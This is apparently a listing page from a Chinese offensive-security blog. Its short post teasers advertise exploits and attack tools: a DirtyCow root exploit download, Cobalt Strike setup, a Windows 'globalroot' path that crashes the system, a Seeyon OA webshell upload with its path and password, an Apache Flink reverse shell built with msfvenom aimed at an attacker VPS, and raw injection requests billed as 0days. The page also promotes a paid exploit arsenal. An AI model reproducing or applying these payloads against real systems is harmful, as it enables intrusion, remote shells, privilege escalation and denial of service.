-
-
脏牛Linux 本地提权
编译好的EXP下载地址: https://github.com/Brucetg/DirtyCow-EXP 该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的写权限,进一步获取 root 权限。 1.Linux Ubuntu 14.04 : 1)添…- 637
- 0
-
-
cobaltstrike 4.2中文版下载及使用(Windows版 MAC版)
去后门! cobaltstrike 4.2中文版下载及使用(Windows版 MAC版) 下载 下载链接已更新为永久(2021.05.09) 下载地址: Windows版: Mac 使用 使用教程 一台Linux机器用于监听 ./teamserver 10.10.10.10 passwd 在Windows下打开cobaltstrike.bat 添加ip与密码 这里提供一个修复RCE版本的cs Wi…- 2.5k
- 0
-
Windows10 globalroot 通杀蓝屏;微信蓝屏代码
原始代码: [wm_red]\\.\globalroot\device\condrv\kernelconnect[/wm_red] html版本、exe版本、XSS版、微信版 [rihide] html版本代码: [wm_red]<html><head></head><body>><script>document.lo…- 1.5k
- 0
-
(最新)致远OA前台未授权任意文件上传getshell
《某OA前台未授权任意文件上传getshell》 冰蝎3 默认马pass:rebeyond Webshell地址:127.0.0.1/seeyon/SeeyonUpdate1.jspx 已验证poc真实有效 影响版本:致远OA V8.0致远OA V7.1、V7.1SP1致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3致远OA V6.0、V6.1SP1、V6.1SP2致远OA V5…- 2.7k
- 0
-
红队利器预告:漏洞库+武器库(第一批漏洞库库开放)
针对HW、红蓝对抗的武器库 漏洞库+武器库 虚拟机形式。 包含漏洞库+武器库 还正在完善。 内侧开始会通知。 2021.03.22 先开放漏洞库吧,2021.03.22前核心会员+100可作为第一批使用漏洞库。 非本站会员 588 可使用漏洞库 目前库里300+漏洞文章与工具,由于时间原因 只是更新了主流的漏洞 后续会逐渐增加 ps:目前服务器等花费太多,本站不做公益。白嫖请绕路。 价格低不代表质…- 3.2k
- 0
-
Apache-flink 未授权访问任意jar包上传反弹shell
[rihide]Apache-flink 未授权访问任意jar包上传反弹shell 影响版本: flink<=1.9.1 利用方法: msf开启监听 ` msfvenom -p java/meterpreter/reverse_tcp LHOST=vpsip LPORT=6666 -f jar > flink.jar use exploit/multi/handler set payl…- 944
- 0
-
渗透测试小tips,有脑就能学废
核心白帽专享 url:https://tips.laolisafe.com/ [rihide]user:admin password:111111111[/rihide]- 1.8k
- 0
-
(CVE-2020-16898)Windows TCP/IP远程执行代码漏洞 exp复现
CVE-2020-16898 微软TCP/IP远程执行代码漏洞 影响版本: 下载Windows 10 镜像 1909 ed2k://|file|cn_windows_10_business_editions_version_1909_x64_dvd_0ca83907.iso|5275090944|9BCD5FA6C8009E4D0260E4B23008BD47|/ 测试版本: 安装scapy pi…- 2.2k
- 0
-
绿盟UTS综合威胁探针管理员任意登录(0day)
漏洞详情: 绿盟全流量威胁分析解决方案针对原始流量进行采集和监控,对流量信息进行深度还原、存储、查询和分析,可以及时掌握重要信息系统相关网络安全威胁风险,及时检测漏洞、病毒木马、网络攻击情况,及时发现网络安全事件线索,及时通报预警重大网络安全威胁,调查、防范和打击网络攻击等恶意行为,保障重要信息系统的网络安全。 绿盟综合威胁探针设备版本V2.0R00F02SP02及之前存在此漏洞。 处置意见: 建…- 1.6k
- 0
-
用友GRP-u8 注入(0day)
`POST /Proxy HTTP/1.1 Accept: Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host Content-Length: 357 Connection: Keep-Alive Cache-Cont…- 2.3k
- 0
-
天融信TopApp-LB 负载均衡系统Sql注入漏洞(0day)
` POST /acc/clsf/report/datasource.php HTTP/1.1 Host: Connection: close Accept: text/javascript, text/html, application/xml, text/xml, / X-Prototype-Version: 1.6.0.3 X-Requested-With: XMLHttpRequest U…- 1.3k
- 0
-
PHPstudy默认Nginx配置存在解析漏洞
刚准备撸狗,就听说phpstudy出洞了,光速爬到电脑前。 高清图可以关注公众号:F11Team ps:实际上该漏洞在2017年就被爆出来了。 再来一遍~ 本次漏洞是nginx的已知解析漏洞 测试环境: phpstudy最新版 Nginx 1.15.11 php任意版本 随便找了张图片 写入 <?php phpinfo();?> 通过Nginx的解析漏洞 xxx.png/xx.php …- 1.2k
- 0
-
-
-
通达OA多枚0day漏洞分享
获取最新漏洞、0day、技术文章 关注微信公众号:F11Team 4枚SQL注入0day 一枚未授权0day 关注公众号回复:通达sql注入0day 获取exp- 2.4k
- 0
-
警惕:你的信息可能已被蓝方获取!!!
人在家中坐,饼从天上来 蜜罐深似海,列表有乾坤 昨日发了一篇文章,是收到了一份蜜罐列表 随后不少公众号也发布了 有的甚至将蜜罐列表公布了出来 在我个人认为 这并不是一件好的事情。 在上篇文章也说了,蜜罐这东西 打开URL 在你毫不知情的情况下 自动获取你的个人、pc指纹信息等 这对小白或不经意打开的人来说 实属防不胜防 另外我看到了 有些公众号也有写出 当收到url后 想去聊天 发现该神秘人已经取…- 936
- 0
-
红蓝对抗中从容应对蓝方蜜罐程序
俗话说一入蜜罐深似海,一脚踏入地狱门 前几天 在公众号后台收到一条消息 称:蓝队所有蜜罐,来自红队的反击。 随后半信半疑的我 打开了几个网址 确定是蜜罐 但是否为蓝队 便不太清楚了 顺手带走了几个接口 普及一下蜜罐: 蜜罐技术本质上是一种对攻击方进行欺骗的技术,通过布置一些作为诱饵的主机、网络服务或者信息,诱使攻击方对它们实施攻击,从而可以对攻击行为进行捕获和分析,了解攻击方所使用的工具与方法,推…- 1.5k
- 0
-
-
红蓝对抗-蓝队蜜罐列表泄露
今天上午公众号后台突然收到一条消息 据称为蓝队多有蜜罐-来自红队的反击。 看了一下 确为蜜罐 但是否为蓝队 尚不明确 30左右个 接口 拿走了 多谢! 更多细节 关注公众号- 1.7k
- 0
-
幸运之星正在降临...
点击领取今天的签到奖励!
恭喜!您今天获得了{{mission.data.mission.credit}}积分
我的优惠劵
-
¥优惠劵使用时效:无法使用使用时效:
之前
使用时效:永久有效优惠劵ID:×
没有优惠劵可用!